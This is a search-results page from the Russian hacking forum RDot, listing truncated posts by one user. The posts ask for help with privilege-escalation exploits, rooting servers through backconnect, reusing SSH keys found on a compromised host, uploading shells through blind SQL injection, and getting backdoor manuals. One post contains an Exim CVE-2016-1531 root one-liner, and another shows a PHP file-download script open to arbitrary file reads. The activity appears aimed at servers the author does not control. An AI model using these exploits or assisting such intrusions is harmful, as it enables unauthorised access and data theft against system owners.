Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 25.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: LorDo
Раздел: Повышение привилегий/Privilege escalation 21.11.2017, 21:50
Ответов: 24
Просмотров: 35,384
Автор LorDo
Ну и что это за дичь ? Кто-то может исправить...

Ну и что это за дичь ? Кто-то может исправить эксплоит ?
Раздел: Оффтоп/Offtopic 15.11.2017, 20:53
Ответов: 3
Просмотров: 5,088
Автор LorDo
Получается на целевой сервер надо сначала...

Получается на целевой сервер надо сначала загрузить архив ?
Раздел: Оффтоп/Offtopic 15.11.2017, 05:04
Ответов: 3
Просмотров: 5,088
Автор LorDo
readfile shell upload

Имеется вот такой стркпт
<?php

$filename = '';
if (isset($_GET['file'])) $filename = $_GET['file'];

if (file_exists($filename)) {
header("Content-type: application/x-download");
...
Раздел: Повышение привилегий/Privilege escalation 10.11.2017, 16:36
Ответов: 3
Просмотров: 7,837
Автор LorDo
Уже пере собрал статически, не пробило :С Unubtu...

Уже пере собрал статически, не пробило :С Unubtu 12.04 а Linux Kernel 4.9.40 какая-то адская смесь
Раздел: Повышение привилегий/Privilege escalation 09.11.2017, 01:57
Ответов: 3
Просмотров: 7,837
Автор LorDo
Вот такя вот шляпа: ./pwn:...

Вот такя вот шляпа:

./pwn: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.17' not found (required by ./pwn)

Чтото с этим сделать можно ?
Раздел: Повышение привилегий/Privilege escalation 06.11.2017, 04:38
Ответов: 24
Просмотров: 35,384
Автор LorDo
Я вот не понял, рутанулся с помощью этого...

Я вот не понял, рутанулся с помощью этого экплоита, а как второй раз под рутом зайти ?
Не изменял в нем ничего, при повторном пользовании пишет

payload target: 127.0.0.1:1234
failed to find a...
Раздел: Оффтоп/Offtopic 01.11.2017, 15:00
Ответов: 4
Просмотров: 7,308
Автор LorDo
Релиз и нужен :)

Релиз и нужен :)
Раздел: Оффтоп/Offtopic 11.10.2017, 13:43
Ответов: 4
Просмотров: 7,308
Автор LorDo
Помогите найти vBulletin 3.6.8 Patch Level 2

Может у кого завалялось или знаете где скачать vBulletin 3.6.8 Patch Level 2
Нужна именно эта древность, уже битый час гуглю и нифига одни битые ссылки
Раздел: Web-среда/Web-applications 09.10.2017, 09:45
Ответов: 3
Просмотров: 9,748
Автор LorDo
А не подскажешь статей или мануалов по установке...

А не подскажешь статей или мануалов по установке и использованию бэкдоров?
Раздел: Web-среда/Web-applications 07.10.2017, 18:45
Ответов: 0
Просмотров: 5,469
Автор LorDo
Файл auth_keys

Есть сервак, рутнул через backconnect, обнаружил файл .auth_keys, в котором куча локальных серверов чтоли и ключи ssh-rsa к ним. Что с этим добром можно сделать? Можно ли по ним подключиться к этим...
Раздел: Уязвимости PHP/PHP vulnerabilities 03.06.2017, 23:56
Ответов: 21
Просмотров: 57,117
Автор LorDo
При таком раскладе можно что-либо сделать : ...

При таком раскладе можно что-либо сделать :

Disabled Functions: dl, memory_limit, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate,...
Раздел: Оффтоп/Offtopic 12.08.2016, 18:59
Ответов: 8
Просмотров: 9,159
Автор LorDo
Увы, тоже пусто

Увы, тоже пусто
Раздел: Оффтоп/Offtopic 12.08.2016, 18:57
Ответов: 8
Просмотров: 9,159
Автор LorDo
Стоит NGINX По путям: ...

Стоит NGINX
По путям:
/var/www/html/.htaccess
/var/www/html/index.html
/var/www/html/index.php
Ничего нет
Раздел: Оффтоп/Offtopic 12.08.2016, 02:17
Ответов: 8
Просмотров: 9,159
Автор LorDo
Естественно вариаций много, я прошу всего лишь...

Естественно вариаций много, я прошу всего лишь девфолтный путь CentOs 6.6
Раздел: Оффтоп/Offtopic 11.08.2016, 19:30
Ответов: 8
Просмотров: 9,159
Автор LorDo
Путь до public_html CentOS

Доброго времени суток. Ребята если у кого шелл или собственный CentOS (желательно 6.6), подскажите структуру файлов. Интересует какого вида имеет путь до "мира", например
...
Раздел: Криптография/Cryptography 25.04.2016, 14:08
Ответов: 821
Просмотров: 451,187
Автор LorDo
b9a7e0f30ba7bdae274cf5bf937e2253 ...

b9a7e0f30ba7bdae274cf5bf937e2253
8d9437d4f91a9cc3b6d918f606c1c0c6
0bfb0e0f7ad41e50ea8f6776a7c01b56
d1f11d69c4bd05a0460ba8bd0d1541a8
Раздел: Повышение привилегий/Privilege escalation 03.04.2016, 19:55
Ответов: 8
Просмотров: 13,725
Автор LorDo
Ну а как конкретней это заюзать ? Просто в веб...

Ну а как конкретней это заюзать ?
Просто в веб шеле в исполняю
PERL5OPT=d PERL5DB='system("id"); exit;' /usr/sbin/exim -ps #CVE-2016-1531
т.е. по факту это будет выглядеть как-то так...
Раздел: Повышение привилегий/Privilege escalation 25.03.2016, 22:57
Ответов: 8
Просмотров: 13,725
Автор LorDo
А backconnect обязателен ? Есть 2 сервака ...

А backconnect обязателен ?
Есть 2 сервака
1)uname -a
Linux 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

/usr/sbin/exim -bV | grep DKIM
Support for:...
Раздел: Повышение привилегий/Privilege escalation 23.03.2016, 09:56
Ответов: 1,219
Просмотров: 684,151
Автор LorDo
exim $ /usr/sbin/exim --version Exim version...

exim
$ /usr/sbin/exim --version
Exim version 4.86_1 #1 built 04-Mar-2016 17:12:16
я так понял это уже исправленная версия

В смысле последний 0day?
Раздел: Повышение привилегий/Privilege escalation 22.03.2016, 20:20
Ответов: 1,219
Просмотров: 684,151
Автор LorDo
Вроде старое ведро может есть у кого идеи ? ...

Вроде старое ведро может есть у кого идеи ?


\n================================================\nuname -a\n================================================
Linux 2.6.32-358.el6.x86_64 #1 SMP Fri...
Раздел: Web-среда/Web-applications 22.03.2016, 18:17
Ответов: 5
Просмотров: 13,235
Автор LorDo
Подниму тему, актуально, т.к. рабочего способа...

Подниму тему, актуально, т.к. рабочего способа пока не нашел если downloader отключен, версия magento 1.8.0.0
Раздел: Форумы 11.01.2016, 22:11
Ответов: 6
Просмотров: 22,796
Автор LorDo
Как узнать реал патч :)

Добрый день, есть BLIND SQL injection
Юзер vasiliy@000.000.000.000
Вот с такими обширными правами



Вот файлик passwd


Права юзера какбы позволяют залить шелл через mysql, но вот беда,...
Раздел: Оффтоп/Offtopic 07.01.2016, 06:37
Ответов: 3
Просмотров: 4,175
Автор LorDo
Можно воспользоваться замечательной штукой...

Можно воспользоваться замечательной штукой --sql-shell
А уже в ней работают обычные SQL запросы как ваш "SELECT one,two FROM db WHERE user_id=1"

Можешь попробовать дампить в sqlite =...
Раздел: Повышение привилегий/Privilege escalation 12.11.2015, 01:09
Ответов: 1,219
Просмотров: 684,151
Автор LorDo
\n================================================...

\n================================================\nuname -a\n================================================
Linux ******** 2.6.18-406.el5 #1 SMP Tue Jun 2 17:25:57 EDT 2015 x86_64 x86_64 x86_64...
Раздел: Повышение привилегий/Privilege escalation 26.03.2015, 10:32
Ответов: 1,219
Просмотров: 684,151
Автор LorDo
**************************************************...

**************************************************
* general information *
* *...
Показано с 1 по 25 из 25.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot